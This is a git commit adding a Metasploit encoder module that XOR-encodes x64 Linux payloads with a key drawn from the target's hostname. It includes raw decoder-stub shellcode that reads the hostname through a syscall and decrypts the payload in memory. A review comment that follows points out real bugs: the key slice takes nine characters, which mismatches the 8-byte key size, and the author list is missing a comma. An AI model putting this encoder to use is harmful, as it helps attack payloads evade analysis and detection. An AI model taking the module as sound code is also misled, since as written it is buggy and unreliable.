
Create xor_context.rb

O . S . O 3 months ago
parent
commit
51fe61838d
1 changed files with 52 additions and 0 deletions
  1. 52
    0
      modules/encoders/x64/xor_context.rb

+ 52
- 0
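--- a/modules/encoders/x64/xor_context.rb
+++ b/modules/encoders/x64/xor_context.rb
@@ -0,0 +1,52 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder::Xor
+
+  def initialize
+    super(
+      'Name'             => 'Hostname-based Context Keyed Payload Encoder',
+      'Description'      => 'Context-Keyed Payload Encoder based on hostname and x64 XOR encoder.',
+      'Author'           => [ 'sf' 'oso' ],
+      'Arch'             => ARCH_X64,
+      'License'          => MSF_LICENSE,
+      'Platform'         => 'linux',
+      'Decoder'          =>
+        {
+          'KeySize'      => 8,
+          'KeyPack'      => 'Q',
+          'BlockSize'    => 8,
+        }
+      )
+
+    register_options([ OptString.new('C_HOSTNAME',[ true, "Context Hostname.", "hostname"])])
+  end
+
+  def obtain_key(buf, badchars, state)
+    # TODO: Currently only first 8 chars are taken as key. We should include the other chars in the key.
+    state.key = datastore['C_HOSTNAME'][0..8].reverse!.unpack('H*')[0].to_i(base=16)
+  end
+
+  def decoder_stub( state )
+    # calculate the (negative) block count . We should check this against state.badchars.
+    block_count = [-( ( (state.buf.length - 1) / state.decoder_key_size) + 1)].pack( "V" )
+
+    decoder = ""+
+      # get hostname
+      "\x6a\x3f\x58" +                  # push 0x3f; pop rax
+      "\x48\x8D\x3C\x24" +              # lea rdi, [rsp]
+      "\x0F\x05" +                      # syscall ; LINUX - sys_uname
+      "\x48\x8B\x5F\x41" +              # movq rbx, [rdi+0x41]; hostname
+
+      # loop
+      "\x48\x31\xC9" +                  # xor rcx, rcx
+      "\x48\x81\xE9" + block_count +    # sub ecx, block_count
+      "\x48\x8D\x05\xEF\xFF\xFF\xFF" +  # lea rax, [rip - 0x01]
+      "\x48\x31\x58\x1d" +              # xor [rax+0x1d], rbx
+      "\x48\x2D\xF8\xFF\xFF\xFF" +      # sub rax, -8
+      "\xE2\xF4"                        # loop 0x1B
+    return decoder
+  end
+end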
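Review bot: `obtain_key` slices nine characters, not eight: `datastore['C_HOSTNAME'][0..8]` is an inclusive range, so any hostname of nine or more characters produces a 72-bit key that no longer matches the `KeySize` of 8 declared in `initialize` nor the single quadword `decoder_stub` loads into rbx from `[rdi+0x41]`; use `datastore['C_HOSTNAME'][0, 8]` and `to_i(16)` in place of `to_i(base=16)`, which assigns a stray local. The default value `"hostname"` masks this because it is exactly eight characters long. A hostname shorter than eight characters likewise yields a key narrower than the declared size; whether the XOR base class pads or rejects it is not visible in this hunk and should be checked. Separately, `'Author' => [ 'sf' 'oso' ]` is missing a comma, so adjacent-literal concatenation registers a single author `'sfoso'`; change it to `'Author' => [ 'sf', 'oso' ],`.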
